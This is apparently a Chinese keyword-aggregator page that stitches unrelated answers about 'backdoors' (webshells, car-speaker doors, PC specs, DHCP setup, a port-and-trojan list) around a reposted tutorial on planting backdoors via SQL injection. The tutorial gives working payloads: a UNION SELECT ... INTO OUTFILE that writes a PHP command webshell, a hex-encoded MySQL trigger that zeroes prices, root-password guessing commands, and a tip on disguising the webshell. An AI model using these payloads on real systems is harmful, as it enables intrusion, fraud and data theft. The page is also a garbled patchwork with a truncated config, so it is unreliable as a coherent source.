① 網站後門-發現後門(Webshell)文件css/mysql.php直接刪掉嗎
刪,既然你都知道是後門了難道你還要留著!如果不放心,可先改文件名接著全注釋代碼,看看網站是否有異常,無異常直接刪。(數據文件,本地備份,先)
② 想改裝一套主動三分頻汽車音響,安裝嗽叭這塊前後門怎樣分配呢
一套主動三分頻,對於一般的四門三廂或者兩廂轎車,建議都裝在前場,低音可以考慮在座位下方,或者踢腳位,中低音,或者中音放車門原廠位,高音在A柱或者鏡帆原廠位,然後通過DSP來調節。
可以考慮德國鼓動的GLADEN ZERO 165.3 ACTIVE套件,然後用義大利舞仕剛柔mosconi來推動
③ 怎麼看電腦配置
cpu:amd athlon(tm)64*2 Dual Core processor 4000+ 2.11 GHz 到這為之是說你的CPU的 4000+片面是說型號,後門是說你的CPU主頻為2.11G
896M是說內存大小,也就玩個XP還行
NVIDIA GeForce 6100 nForece 405是說顯卡 NVIDIA GeForce 6100是型號。是個集成顯卡。糾正個錯誤後面是nforce 405 。這個顯卡也就玩個CS之類的小游戲
這個機器玩不了打游戲,上網還是綽綽有餘的
④ 裝系統中的後門是什麼起什麼作用有什麼有利和有害的如何弄
系統後門一般是指那些繞過安全性控制而獲取對程序或系統訪問權的程序方法。
創建過程:在軟體的開發階段,程序員常常會在軟體內創建後門程序以便可以修改程序設計中的缺陷。
利弊:使再次侵入被發現的可能性減至最低。但是,如果這些後門被其他人知道,或是在發布軟體之前沒有刪除後門程序,那麼它就成了安全風險,容易被黑客當成漏洞進行攻擊。
作用:使系統管理員無法阻止種植者再次進入系統:使種植者在系統中不易被發現:使種植者進入系統花最少時間。
(4)後門配置怎麼看擴展閱讀
早期的電腦黑客,在成功獲得遠程系統的控制權後,希望能有一種技術使得他們在任意的時間都可以再次進入遠程系統,於是後門程序就出現了。
後門程序跟我們通常所說的「木馬」有聯系也有區別。聯系在於,都是隱藏在用戶系統中向外發送信息,而且本身具有一定許可權,以便遠程機器對本機的控制;區別在於,木馬是一個非常完整的工具集合,而後門則體積較小且功能都很單一,所以木馬提供的功能遠遠超過後門程序。
⑤ 如何利用SQL注入製造一個後門
如何利用SQL注入製造一個後門
0×01,介紹…
0×02,什麼是Sql Injection..
0×03,一個系統後門(OS)Backdoor.
0×04,獲得一個OS Shell
0×05,一個資料庫後門(Database backdoor).
0×07,推薦的防禦措施…
0×08,結論…
0×09,參考…
0×01,介紹
如果你正在讀這篇文章那麼我有理由相信你曾經聽說過一種病毒,或者是它一種特洛伊木馬或者蠕蟲,這類惡意程序可以感染你的計算機系統。一旦你的計算機系統被感染,那麼當你使被感染的計算機連接到互聯網,它很可能會去感染其他的計算機。許多時候,惡意軟體不僅僅只是從一台計算機傳播到另一台,他們會針對每一台感染的計算機進行自身的變異。這些變化將會讓病毒遠程的控制每一台計算機並使它們在之後感染更多的計算機系統。這些病毒第一次執行時會復制一個小型的可執行文件到用戶的磁碟上,這個可執行文件僅僅會監聽在當前計算機系統未使用的埠上從而惡意軟體可以在被感染主機連入互聯網的任意時刻訪問這台主機。這個小的可執行文件叫做後門(Backdoor)。我在這里已經簡要的說明了後門的概念。
0×02,什麼是Sql Injection
已經有超過1百萬的文章講述了什麼是Sql注入並且怎樣去發現和怎樣去避免這類威脅,所以我不想再次重復。如果你需要了解一些關於Sql注入的背景知識,這里有一個介紹性文章的連接可以供你閱讀。這篇文章末尾我也提供了一些參考資料可以讓你針對這篇文章所討論的話題獲得更多的知識信息。
0×03,一個系統後門(OS)Backdoor
這篇文章的目的是利用Sql Injection執行各種各樣的命令最終控制操作系統。為了運行系統命令,我們需要一個CMD shell,或者需要執行一些代碼使得我們可以執行OS命令。讓我們分別嘗試一下這兩種方法。
0×04,獲得一個OS Shell
現在我們將寫我們自己的代碼使之可以讓我們運行任意OS命令來控制操作系統。所以,從之前的文章中我們已經知道搜索部分的變數存在Sql Injection並且在question表中存在4個列名。作為提示,語句Harry Potter』 union select 1,2,3,4#將會出現錯誤:
現在,我們想插入可以執行系統命令的PHP代碼。為了實現這個目的,我們使用MYsql提供的INTO OUTFILE特性。使用Using INTO OUTFILE,可以將查詢的輸出重定向到系統的文件中去。真因為如此,我們可以執行Harry Potter』 union select 『TEXT INTO FILE』,2,3 INTO OUTFILE 『/tmp/blah.txt』#,然後字元串『TEXT INTO FILE』將會被存儲在目錄/tmp下的blah.txt中。如圖:
現在我們將 『TEXT INTO FILE』替換成基本的PHP代碼使之可以讀取URL的參數來執行系統命令控制操作系統。我們使用這樣的語句: Harry Potter』 union select 「<?system($_REQUEST['cmd']); ?>」,2,3 INTO OUTFILE 『/var/www/test/execcmd.php』# ,如圖:
就是這樣!但是還出現了很多我們根本不關心的書籍的內容。所以我調整了我的查詢語句為:
『 union select 「<? system($_REQUEST['cmd']); ?>」,2,3 INTO OUTFILE 『/var/www/test/execcmd.php』#並再次執行。
盡管這回還是返回了2和3,但是好多了。
現在我們訪問execcmd.php並把命令[cat /etc.passwd]傳遞給我們想提交執行的參數。
成功了。通過我多次的嘗試,這里有幾點需要注意的事情。
–運行這條語句的資料庫用戶需要擁有FILE許可權,否則不能執行INTO OUTFILE命令。
–在MySQL服務運行的主機中必須存在一個可寫的Web目錄,否則你不能訪問你剛剛上傳的Webshell。你可以將代碼寫入到總是可寫的目錄像/ttmp,但是你沒有許可權訪問它。
一種簡單的方式來實現OS Shell是使用SQLMap內置的特性。如果你讀過我之前的文章,你會記得我使用過SQLMap。讓我們通過SQLMap來完成同樣的事情。
下面的OS shell截圖是在使用SQLMap進行注入時加入了一個簡單的參數並且在提示處選擇了PHP Web Shell而獲得的。
運行一個命令來檢查我們是否已經獲得了一個Shell。OK,沒問題。
這實在是太容易了。
不幸的是,從『破壞者』的角度來看這也同樣是簡單的。
現在有了這么簡單快捷的方法你肯定不想再用之前的方法了,但是知道手動利用的方法總是有幫助的(這樣當使用工具失敗時你可以有另外的方法)。還有一件事需要注意,難獲得了一
個WebShell時,請使用一個和Web目錄中已經存在的文件十分相似的名字去命名。這會幫助你隱藏你的WebShell使之不會被管理員不經意間輕易的發現。
在開始下一類Backdoor之前,我將向你展示隱藏SQLMap的方法。你可以通過設置代理來運行SQLMap。
然後當SQLMap將實際的WebShell上傳到可寫目錄的時候,brupSuite會攔截到一些請求,讓我們看一下這些請求。
我們能看到一些熟悉的東西。讓我們通過URL decode來確定一下。看一下在底部面板的藍色高亮的部分。它顯示出SQLMap正在使用INTO OUTFILE命令,和我們之前人工使用的方法是一樣的。
最後,我們看一下SQLMap上傳WebShell的內容,非常有意思,看一下底部的面板。
這就是關鍵,工具再一次的大大簡化了我們本該花費大量時間進行的繁瑣工作。
0×05,一個資料庫後門(Database backdoor)
現在我們知道一個OS後門可以在Web應用存在SQL Injection時被植入到系統中。現在讓我們看看如何在資料庫中植入一個後門吧。在我們繼續之前,我們需要一些了解一下backdoor function的相關知識。在OS backdoor中,我們直接訪問了後門並且傳遞給它了一個命令;但在這里卻並不會那麼直接。當我們每一個插入的操作執行時,我們配置的後門會改變資料庫中一些敏感數據的值。所以,每一本書在添加到資料庫中時價格會被我們的後門設置成0,以至於人們可以免費「購買」這些書籍。這在真實的環境中可能會很快被發現。
所以我們在資料庫中有一些叫做「觸發器」的東西,基本的意思就是——「當某些我們希望發生的事情發生時,觸動觸發器去做另外一些事情」。這描述的確實太模糊了,然我們舉一個更明顯的例子。假如你是一個警察,某一時刻你看到一個連環殺手,你扣動扳機並且發射出一枚子彈對么?那麼把他轉換為我們之前的場景——有一個INSERT語句(殺手),一個Database trigger(槍手)開火了,那麼動作(action)就是釋放你之前已經配置(configured)好的子彈(bullet)。
下面使我們要寫的一個MySQL觸發器的例子:
delimiter #
CREATE TRIGGER price BEFORE INSERT ON books
for each row begin
set new.price=』0′;
end;#
delimiter ;
b)無論任何時候如果我們執行一個Insert語句,比如假如一本書,那麼我們設置其價格為0.下面是它的意思:
a)設置默認的MySQL分隔符為』#',因為默認的分隔符是』;'在MySQL作為特殊字元處理了,而我們需要將其作為數據處理。所以我們改變分隔符為』#',表示』#'現在有一個特殊的含義。
c)終止觸發器並將分隔符重置為』;'。
然我們使用Sql Injection將觸發器復制到伺服器上。下面是要作為搜索框輸入的語句:
Harry Potter』 AND 1=0 union select 0×20,0×20,0×20 INTO OUTFILE 『/var/www/test/g2′ LINES TERMINATED BY 6d69746572203b#
我會快速解釋一下這個查詢語句—因為即使看起來它很復雜—其實不然。我們使用1=0因為我們對關於《Harry Potter》的查詢結果並不感興趣。0×20的位置只是查詢了三次空格』space』;這是為了我可以僅僅得到想要重定向到文件』/var/www/test.g2′中的內容。然後LINES TERMINATED BY後面的部分是整個觸發器使用hex函數轉換後的形式(我是用的是Brup Decoder,不要坐在那兒浪費時間去手工轉化它)。
讓我們運行一下看看會在文件/var/www/test/g2中出現什麼。
你注意到了最開始的幾個空格了么?這就是我們之前看到的select 0×20,0×20,0×20的作用。之後的內容就顯而易見了。
現在我們以某種方式執行這個查詢然後我們的觸發器會在每次一本書被插入時激活,這里有三種實現的方法。
a)多語句查詢(Stacked Queries)—Harry Potter』 UNION blah blah blah;source /var/www/test/g2但是這事實上不會成功執行,因為PHP+MySQL不支持多語句查詢。
b)濫用MySQL默認觸發器行為(Abusing MySQL default trigger behavior)—這種方法我還沒有測試過,不過在Stefano Di Paola的文章中被描述的非常清楚。嘗試一下吧,我找時間也會測試一下。
c)使用SQL Injection工具比如SQLMap運行我們存放在/var/www/test/g2中保存的觸發器。這是我們將要測試的方法。
我們來再次運行SQLMap並獲得一個我們可以運行觸發器的SQL shell。
看最後一行。不幸的是,只有當支持多語句查詢時,這種方法才可以執行。這意味著上面的選項a,c意味著同一種情況。讓我們通過代理來查看SQLMap的請求。
讓我們在Sql-shell中執行一個簡單的創建新資料庫的語句—」create database boo;」並在Brup中查看。
我們可以看到,SQLMap嘗試將它轉換為一個SELECT查詢。這將永遠不會執行成功。從Burp相應的內容證實了這一點。
我能想到的唯一一種能夠順序執行我們的查詢的可行辦法包含以下幾個步驟:
—猜解一個有效MySQL用戶的密碼。例如,你猜到root的密碼是test123
—注入一個OS webshell後門。
—注入一個類似之前格式的觸發器。
—現在通過在Webshell中運行MySQL命令來安裝觸發器。
我有幾張截圖來說明為什麼這樣是可行的。為了照顧初學者,這里有張截圖表名當前不存在任何觸發器。
假設我們已經猜解到了用戶名和密碼root和toor(通過Blind SQL暴力猜解mysql.user表)。現在我們反問Web shell並傳遞一個命令:
mysql -u<USERNAME> -p<PASSWORD> <DB NAME> < /var/www/test/g2
現在我們再來看一下資料庫。
看到了我們的觸發器。
現在我們來運行一個INSERT查詢來檢查我們的觸發器是否會運行。然後所有Jeffrey Archer的書的價格會變得非常不可思議。
現在執行查詢:
看最後一行。某些人可以不用支付他本認為應該支付的價格了。
現在我們直接執行一個INSERT查詢來控制資料庫。在真實環境中將會有一個表單來添加書籍,在後端很可能會有一個INSERT查詢,這時觸發器很有可能被觸發執行。這是我沒有創建另外一個表單的唯一原因。
明顯地,一個大前提是我們能夠猜解資料庫的用戶名和密碼。下面有一個簡單的思路可以讓你實現這個目的。
—想一些常用的資料庫用戶名(比如MySQL的root)或者通過社會工程學獲得一些。
—MySQL密碼是通過哈希加密的,並不是明文。
你可以通過以下兩種方式破解密碼:
—通過SQL Injection將密碼的Hash與密碼明文列表對比。(參考我之前的文章)
—在WebShell中通過密碼明文列表和一個特定的用戶名來運行觸發器。你可以寫一個Perl或者Ruby腳本來為你做這些事情。嘗試在遍歷完明文密碼列表之後插入一本書,或者在每次猜解後找出那個密碼是正確的。
mysql -uroot -ptoor blindsql_test< /var/www/test/g2
mysql -uroot -proot blindsql_test< /var/www/test/g2
mysql -uroot -ptest blindsql_test< /var/www/test/g2
mysql -uroot -ppassword blindsql_test< /var/www/test/g2
0×07,推薦的防禦措施
a)使用參數化查詢來防禦SQL注入攻擊。
b)不要在Web目錄中存在大量可寫目錄。
c)限制Web應用在後端查詢資料庫的用戶的許可權。為了實現這一點,不要給其分配FILE許可權。
d)設置復雜的資料庫密碼和健壯的密碼策略。
0×08,結論
這個問題的根源,是Web應用存在Sql注入弱點。修復它將會阻止這種威脅的發生。然而,知道不同的植入後門的方法還是有益的。許多惡意軟體將會通過這種方式傳播;也需要採取措施來防止它們。
出自:http://www.freebuf.com/articles/222.html
⑥ centos5.5版本的伺服器系統後門怎麼找出來
一、安裝配置dhcp [root@localhost ~]# yum -y install dhcp [root@localhost ~]# cd /usr/share/doc/dhcp-4"; DNS伺服器域名 option domain-name-servers 192.168.1.24; DNS伺服器的IP地址 default-lease-time 360000; 默認租約時間 max-lease-time 720000; 最大租約時間 ddns-update-style none; log-facility local7; subnet 192.168.1.0 netmask 255.255.255.0 { 分配的網段192.168.1.0/24 range 192.168.1.100 192.168.1.230; 分配的ip地址區間; option routers 192.168.1.1; 網關ip; option broadcast-address 192.168.1.255; 廣播地址; } host boss { boss為主機名,隨便取; hardware ethernet 00:0C:29:6C:A6:F8; 主機網卡的mac地址; fixed-address 192.168.1.10; 給其分配的ip; } [root@localhost ~]# /etc/init.d/dhcpd restart 關閉 dhcpd: [確定] 正在啟動 dhcpd: [確定] 三、查看埠監聽狀態 [root@localhost ~]# netstat -ltunp grep dhcpd udp 0 0 0.0.0.0:67 0.0.0.0:* 5346/dhcpd Linux系統下構建DHCP伺服器 /Linux/2013-06/86531.htm CentOS下配置主從DNS伺服器以及DHCP下的DDNS/Linux/2013-06/85634.htm SUSELinux 11 pxe+DHCP+tftp+ftp 無人值守安裝/Linux/2013-06/85481.htm Linux下架設DHCP伺服器過程及3種測試 /Linux/2013-05/84832.htm Linux上一步一步實現DHCP伺服器 /Linux/2013-04/82244.htm CentOS 6.5系統下構建DHCP伺服器 /Linux/2014-06/103203.htm
⑦ 我是菜鳥,大家幫我看看這些埠是不是後門。*:*代表什麼
入侵電腦埠
埠:0
服務:Reserved
說明:通常用於分析操作系統。這一方法能夠工作是因為在一些系統中「0」是無效埠,當你試圖使用通常的閉合埠連接它時將產生不同的結果。一種典型的掃描,使用IP地址為0.0.0.0,設置ACK位並在乙太網層廣播。
埠:1
服務:tcpmux
說明:這顯示有人在尋找SGI Irix機器。Irix是實現tcpmux的主要提供者,默認情況下tcpmux在這種系統中被打開。Irix機器在發布是含有幾個默認的無密碼的帳戶,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。許多管理員在安裝後忘記刪除這些帳戶。因此HACKER在INTERNET上搜索tcpmux並利用這些帳戶。
埠:7
服務:Echo
說明:能看到許多人搜索Fraggle放大器時,發送到X.X.X.0和X.X.X.255的信息。
埠:19
服務:Character Generator
說明:這是一種僅僅發送字元的服務。UDP版本將會在收到UDP包後回應含有垃圾字元的包。TCP連接時會發送含有垃圾字元的數據流直到連接關閉。HACKER利用IP欺騙可以發動DoS攻擊。偽造兩個chargen伺服器之間的UDP包。同樣Fraggle DoS攻擊向目標地址的這個埠廣播一個帶有偽造受害者IP的數據包,受害者為了回應這些數據而過載。
埠:21
服務:FTP
說明:FTP伺服器所開放的埠,用於上傳、下載。最常見的攻擊者用於尋找打開anonymous的FTP伺服器的方法。這些伺服器帶有可讀寫的目錄。木馬Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所開放的埠。
埠:22
服務:Ssh
說明:PcAnywhere建立的TCP和這一埠的連接可能是為了尋找ssh。這一服務有許多弱點,如果配置成特定的模式,許多使用RSAREF庫的版本就會有不少的漏洞存在。
埠:23
服務:Telnet
說明:遠程登錄,入侵者在搜索遠程登錄UNIX的服務。大多數情況下掃描這一埠是為了找到機器運行的操作系統。還有使用其他技術,入侵者也會找到密碼。木馬Tiny Telnet Server就開放這個埠。
埠:25
服務:SMTP
說明:SMTP伺服器所開放的埠,用於發送郵件。入侵者尋找SMTP伺服器是為了傳遞他們的SPAM。入侵者的帳戶被關閉,他們需要連接到高帶寬的E-MAIL伺服器上,將簡單的信息傳遞到不同的地址。木馬Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都開放這個埠。
埠:31
服務:MSG Authentication
說明:木馬Master Paradise、Hackers Paradise開放此埠。
埠:42
服務:WINS Replication
說明:WINS復制
埠:53
服務:Domain Name Server(DNS)
說明:DNS伺服器所開放的埠,入侵者可能是試圖進行區域傳遞(TCP),欺騙DNS(UDP)或隱藏其他的通信。因此防火牆常常過濾或記錄此埠。
埠:67
服務:Bootstrap Protocol Server
說明:通過DSL和Cable modem的防火牆常會看見大量發送到廣播地址255.255.255.255的數據。這些機器在向DHCP伺服器請求一個地址。HACKER常進入它們,分配一個地址把自己作為局部路由器而發起大量中間人(man-in-middle)攻擊。客戶端向68埠廣播請求配置,伺服器向67埠廣播回應請求。這種回應使用廣播是因為客戶端還不知道可以發送的IP地址。
埠:69
服務:Trival File Transfer
說明:許多伺服器與bootp一起提供這項服務,便於從系統下載啟動代碼。但是它們常常由於錯誤配置而使入侵者能從系統中竊取任何 文件。它們也可用於系統寫入文件。
埠:79
服務:Finger Server
說明:入侵者用於獲得用戶信息,查詢操作系統,探測已知的緩沖區溢出錯誤,回應從自己機器到其他機器Finger掃描。
埠:80
服務:HTTP
說明:用於網頁瀏覽。木馬Executor開放此埠。
埠:99
服務:Metagram Relay
說明:後門程序ncx99開放此埠。
埠:102
服務:Message transfer agent(MTA)-X.400 over TCP/IP
說明:消息傳輸代理。
埠:109
服務:Post Office Protocol -Version3
說明:POP3伺服器開放此埠,用於接收郵件,客戶端訪問伺服器端的郵件服務。POP3服務有許多公認的弱點。關於用戶名和密碼交 換緩沖區溢出的弱點至少有20個,這意味著入侵者可以在真正登陸前進入系統。成功登陸後還有其他緩沖區溢出錯誤。
埠:110
服務:SUN公司的RPC服務所有埠
說明:常見RPC服務有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等
埠:113
服務:Authentication Service
說明:這是一個許多計算機上運行的協議,用於鑒別TCP連接的用戶。使用標準的這種服務可以獲得許多計算機的信息。但是它可作為許多服務的記錄器,尤其是FTP、POP、IMAP、SMTP和IRC等服務。通常如果有許多客戶通過防火牆訪問這些服務,將會看到許多這個埠的連接請求。記住,如果阻斷這個埠客戶端會感覺到在防火牆另一邊與E-MAIL伺服器的緩慢連接。許多防火牆支持TCP連接的阻斷過程中發回RST。這將會停止緩慢的連接。
埠:119
服務:Network News Transfer Protocol
說明:NEWS新聞組傳輸協議,承載USENET通信。這個埠的連接通常是人們在尋找USENET伺服器。多數ISP限制,只有他們的客戶才能訪問他們的新聞組伺服器。打開新聞組伺服器將允許發/讀任何人的帖子,訪問被限制的新聞組伺服器,匿名發帖或發送SPAM。
埠:135
服務:Location Service
說明:Microsoft在這個埠運行DCE RPC end-point mapper為它的DCOM服務。這與UNIX 111埠的功能很相似。使用DCOM和RPC的服務利用計算機上的end-point mapper注冊它們的位置。遠端客戶連接到計算機時,它們查找end-point mapper找到服務的位置。HACKER掃描計算機的這個埠是為了找到這個計算機上運行Exchange Server嗎?什麼版本?還有些DOS攻擊直接針對這個埠。
埠:137、138、139
服務:NETBIOS Name Service
說明:其中137、138是UDP埠,當通過網上鄰居傳輸文件時用這個埠。而139埠:通過這個埠進入的連接試圖獲得NetBIOS/SMB服務。這個協議被用於windows文件和列印機共享和SAMBA。還有WINS Regisrtation也用它。
埠:143
服務:Interim Mail Access Protocol v2
說明:和POP3的安全問題一樣,許多IMAP伺服器存在有緩沖區溢出漏洞。記住:一種LINUX蠕蟲(admv0rm)會通過這個埠繁殖,因此許多這個埠的掃描來自不知情的已經被感染的用戶。當REDHAT在他們的LINUX發布版本中默認允許IMAP後,這些漏洞變的很流行。這一埠還被用於IMAP2,但並不流行。
埠:161
服務:SNMP
說明:SNMP允許遠程管理設備。所有配置和運行信息的儲存在資料庫中,通過SNMP可獲得這些信息。許多管理員的錯誤配置將被暴露在Internet。Cackers將試圖使用默認的密碼public、private訪問系統。他們可能會試驗所有可能的組合。SNMP包可能會被錯誤的指向用戶的網路。
埠:177
服務:X Display Manager Control Protocol
說明:許多入侵者通過它訪問X-windows操作台,它同時需要打開6000埠。
埠:389
服務:LDAP、ILS
說明:輕型目錄訪問協議和NetMeeting Internet Locator Server共用這一埠。
埠:443
服務:Https
說明:網頁瀏覽埠,能提供加密和通過安全埠傳輸的另一種HTTP。
埠:456
服務:[NULL]
說明:木馬HACKERS PARADISE開放此埠。
埠:513
服務:Login,remote login
說明:是從使用cable modem或DSL登陸到子網中的UNIX計算機發出的廣播。這些人為入侵者進入他們的系統提供了信息。
埠:544
服務:[NULL]
說明:kerberos kshell
埠:548
服務:Macintosh,File Services(AFP/IP)
說明:Macintosh,文件服務。
埠:553
服務:CORBA IIOP (UDP)
說明:使用cable modem、DSL或VLAN將會看到這個埠的廣播。CORBA是一種面向對象的RPC系統。入侵者可以利用這些信息進入系統。
埠:555
服務:DSF
說明:木馬PhAse1.0、Stealth Spy、IniKiller開放此埠。
埠:568
服務:Membership DPA
說明:成員資格 DPA。
埠:569
服務:Membership MSN
說明:成員資格 MSN。
埠:635
服務:mountd
說明:Linux的mountd Bug。這是掃描的一個流行BUG。大多數對這個埠的掃描是基於UDP的,但是基於TCP的mountd有所增加(mountd同時運行於兩個埠)。記住mountd可運行於任何埠(到底是哪個埠,需要在埠111做portmap查詢),只是Linux默認埠是635,就像NFS通常運行於2049埠。
埠:636
服務:LDAP
說明:SSL(Secure Sockets layer)
埠:666
服務:Doom Id Software
說明:木馬Attack FTP、Satanz Backdoor開放此埠
埠:993
服務:IMAP
說明:SSL(Secure Sockets layer)
埠:1001、1011
服務:[NULL]
說明:木馬Silencer、WebEx開放1001埠。木馬Doly Trojan開放1011埠。
埠:1024
服務:Reserved
說明:它是動態埠的開始,許多程序並不在乎用哪個埠連接網路,它們請求系統為它們分配下一個閑置埠。基於這一點分配從埠1024開始。這就是說第一個向系統發出請求的會分配到1024埠。你可以重啟機器,打開Telnet,再打開一個窗口運行natstat -a 將會看到Telnet被分配1024埠。還有SQL session也用此埠和5000埠。
埠:1025、1033
服務:1025:network blackjack 1033:[NULL]
說明:木馬netspy開放這2個埠。
埠:1080
服務:SOCKS
說明:這一協議以通道方式穿過防火牆,允許防火牆後面的人通過一個IP地址訪問INTERNET。理論上它應該只允許內部的通信向外到達INTERNET。但是由於錯誤的配置,它會允許位於防火牆外部的攻擊穿過防火牆。WinGate常會發生這種錯誤,在加入IRC聊天室時常會看到這種情況。
埠:1170
服務:[NULL]
說明:木馬Streaming Audio Trojan、Psyber Stream Server、Voice開放此埠。
埠:1234、1243、6711、6776
服務:[NULL]
說明:木馬SubSeven2.0、Ultors Trojan開放1234、6776埠。木馬SubSeven1.0/1.9開放1243、6711、6776埠。
埠:1245
服務:[NULL]
說明:木馬Vodoo開放此埠。
埠:1433
服務:SQL
說明:Microsoft的SQL服務開放的埠。
埠:1492
服務:stone-design-1
說明:木馬FTP99CMP開放此埠。
埠:1500
服務:RPC client fixed port session queries
說明:RPC客戶固定埠會話查詢
埠:1503
服務:NetMeeting T.120
說明:NetMeeting T.120
埠:1524
服務:ingress
說明:許多攻擊腳本將安裝一個後門SHELL於這個埠,尤其是針對SUN系統中Sendmail和RPC服務漏洞的腳本。如果剛安裝了防火牆就看到在這個埠上的連接企圖,很可能是上述原因。可以試試Telnet到用戶的計算機上的這個埠,看看它是否會給你一個SHELL。連接到600/pcserver也存在這個問題。
埠:1600
服務:issd
說明:木馬Shivka-Burka開放此埠。
埠:1720
服務:NetMeeting
說明:NetMeeting H.233 call Setup。
埠:1731
服務:NetMeeting Audio Call Control
說明:NetMeeting音頻調用控制。
埠:1807
服務:[NULL]
說明:木馬SpySender開放此埠。
埠:1981
服務:[NULL]
說明:木馬ShockRave開放此埠。
埠:1999
服務:cisco identification port
說明:木馬BackDoor開放此埠。
埠:2000
服務:[NULL]
說明:木馬GirlFriend 1.3、Millenium 1.0開放此埠。
埠:2001
服務:[NULL]
說明:木馬Millenium 1.0、Trojan Cow開放此埠。
埠:2023
服務:xinuexpansion 4
說明:木馬Pass Ripper開放此埠。
埠:2049
服務:NFS
說明:NFS程序常運行於這個埠。通常需要訪問Portmapper查詢這個服務運行於哪個埠。
埠:2115
服務:[NULL]
說明:木馬Bugs開放此埠。
埠:2140、3150
服務:[NULL]
說明:木馬Deep Throat 1.0/3.0開放此埠。
埠:2500
服務:RPC client using a fixed port session replication
說明:應用固定埠會話復制的RPC客戶
埠:2583
服務:[NULL]
說明:木馬Wincrash 2.0開放此埠。
埠:2801
服務:[NULL]
說明:木馬Phineas Phucker開放此埠。
埠:3024、4092
服務:[NULL]
說明:木馬WinCrash開放此埠。
埠:3128
服務:squid
說明:這是squid HTTP代理伺服器的默認埠。攻擊者掃描這個埠是為了搜尋一個代理伺服器而匿名訪問Internet。也會看到搜索其他代理伺服器的埠8000、8001、8080、8888。掃描這個埠的另一個原因是用戶正在進入聊天室。其他用戶也會檢驗這個埠以確定用戶的機器是否支持代理。
埠:3129
服務:[NULL]
說明:木馬Master Paradise開放此埠。
埠:3150
服務:[NULL]
說明:木馬The Invasor開放此埠。
埠:3210、4321
服務:[NULL]
說明:木馬SchoolBus開放此埠
埠:3333
服務:dec-notes
說明:木馬Prosiak開放此埠
埠:3389
服務:超級終端
說明:WINDOWS 2000終端開放此埠。
埠:3700
服務:[NULL]
說明:木馬Portal of Doom開放此埠
埠:3996、4060
服務:[NULL]
說明:木馬RemoteAnything開放此埠
埠:4000
服務:QQ客戶端
說明:騰訊QQ客戶端開放此埠。
埠:4092
服務:[NULL]
說明:木馬WinCrash開放此埠。
埠:4590
服務:[NULL]
說明:木馬ICQTrojan開放此埠。
埠:5000、5001、5321、50505
服務:[NULL]
說明:木馬blazer5開放5000埠。木馬Sockets de Troie開放5000、5001、5321、50505埠。
埠:5400、5401、5402
服務:[NULL]
說明:木馬Blade Runner開放此埠。
埠:5550
服務:[NULL]
說明:木馬xtcp開放此埠。
埠:5569
服務:[NULL]
說明:木馬Robo-Hack開放此埠。
埠:5632
服務:pcAnywere
說明:有時會看到很多這個埠的掃描,這依賴於用戶所在的位置。當用戶打開pcAnywere時,它會自動掃描區域網C類網以尋找可能的代理(這里的代理是指agent而不是proxy)。入侵者也會尋找開放這種服務的計算機。,所以應該查看這種掃描的源地址。一些搜尋pcAnywere的掃描包常含埠22的UDP數據包。
埠:5742
服務:[NULL]
說明:木馬WinCrash1.03開放此埠。
埠:6267
服務:[NULL]
說明:木馬廣外女生開放此埠。
埠:6400
服務:[NULL]
說明:木馬The tHing開放此埠。
埠:6670、6671
服務:[NULL]
說明:木馬Deep Throat開放6670埠。而Deep Throat 3.0開放6671埠。
埠:6883
服務:[NULL]
說明:木馬DeltaSource開放此埠。
埠:6969
服務:[NULL]
說明:木馬Gatecrasher、Priority開放此埠。
埠:6970
服務:RealAudio
說明:RealAudio客戶將從伺服器的6970-7170的UDP埠接收音頻數據流。這是由TCP-7070埠外向控制連接設置的。
埠:7000
服務:[NULL]
說明:木馬Remote Grab開放此埠。
埠:7300、7301、7306、7307、7308
服務:[NULL]
說明:木馬NetMonitor開放此埠。另外NetSpy1.0也開放7306埠。
埠:7323
服務:[NULL]
說明:Sygate伺服器端。
埠:7626
服務:[NULL]
說明:木馬Giscier開放此埠。
埠:7789
服務:[NULL]
說明:木馬ICKiller開放此埠。
埠:8000
服務:OICQ
說明:騰訊QQ伺服器端開放此埠。
埠:8010
服務:Wingate
說明:Wingate代理開放此埠。
埠:8080
服務:代理埠
說明:WWW代理開放此埠。
埠:9400、9401、9402
服務:[NULL]
說明:木馬Incommand 1.0開放此埠。
埠:9872、9873、9874、9875、10067、10167
服務:[NULL]
說明:木馬Portal of Doom開放此埠。
埠:9989
服務:[NULL]
說明:木馬iNi-Killer開放此埠。
埠:11000
服務:[NULL]
說明:木馬SennaSpy開放此埠。
埠:11223
服務:[NULL]
說明:木馬Progenic trojan開放此埠。
埠:12076、61466
服務:[NULL]
說明:木馬Telecommando開放此埠。
埠:12223
服務:[NULL]
說明:木馬Hack'99 KeyLogger開放此埠。
埠:12345、12346
服務:[NULL]
說明:木馬NetBus1.60/1.70、GabanBus開放此埠。
埠:12361
服務:[NULL]
說明:木馬Whack-a-mole開放此埠。
埠:13223
服務:PowWow
說明:PowWow是Tribal Voice的聊天程序。它允許用戶在此埠打開私人聊天的連接。這一程序對於建立連接非常具有攻擊性。它會駐扎在這個TCP埠等回應。造成類似心跳間隔的連接請求。如果一個撥號用戶從另一個聊天者手中繼承了IP地址就會發生好象有很多不同的人在測試這個埠的情況。這一協議使用OPNG作為其連接請求的前4個位元組。
埠:16969
服務:[NULL]
說明:木馬Priority開放此埠。
埠:17027
服務:Concent
說明:這是一個外向連接。這是由於公司內部有人安裝了帶有Concent"adbot"的共享軟體。Concent"adbot"是為共享軟體顯示廣告服務的。使用這種服務的一種流行的軟體是Pkware。
埠:19191
服務:[NULL]
說明:木馬藍色火焰開放此埠。
埠:20000、20001
服務:[NULL]
說明:木馬Millennium開放此埠。
埠:20034
服務:[NULL]
說明:木馬NetBus Pro開放此埠。
埠:21554
服務:[NULL]
說明:木馬GirlFriend開放此埠。
埠:22222
服務:[NULL]
說明:木馬Prosiak開放此埠。
埠:23456
服務:[NULL]
說明:木馬Evil FTP、Ugly FTP開放此埠。
埠:26274、47262
服務:[NULL]
說明:木馬Delta開放此埠。
埠:27374
服務:[NULL]
說明:木馬Subseven 2.1開放此埠。
埠:30100
服務:[NULL]
說明:木馬NetSphere開放此埠。
埠:30303
服務:[NULL]
說明:木馬Socket23開放此埠。
埠:30999
服務:[NULL]
說明:木馬Kuang開放此埠。
埠:31337、31338
服務:[NULL]
說明:木馬BO(Back Orifice)開放此埠。另外木馬DeepBO也開放31338埠。
埠:31339
服務:[NULL]
說明:木馬NetSpy DK開放此埠。
埠:31666
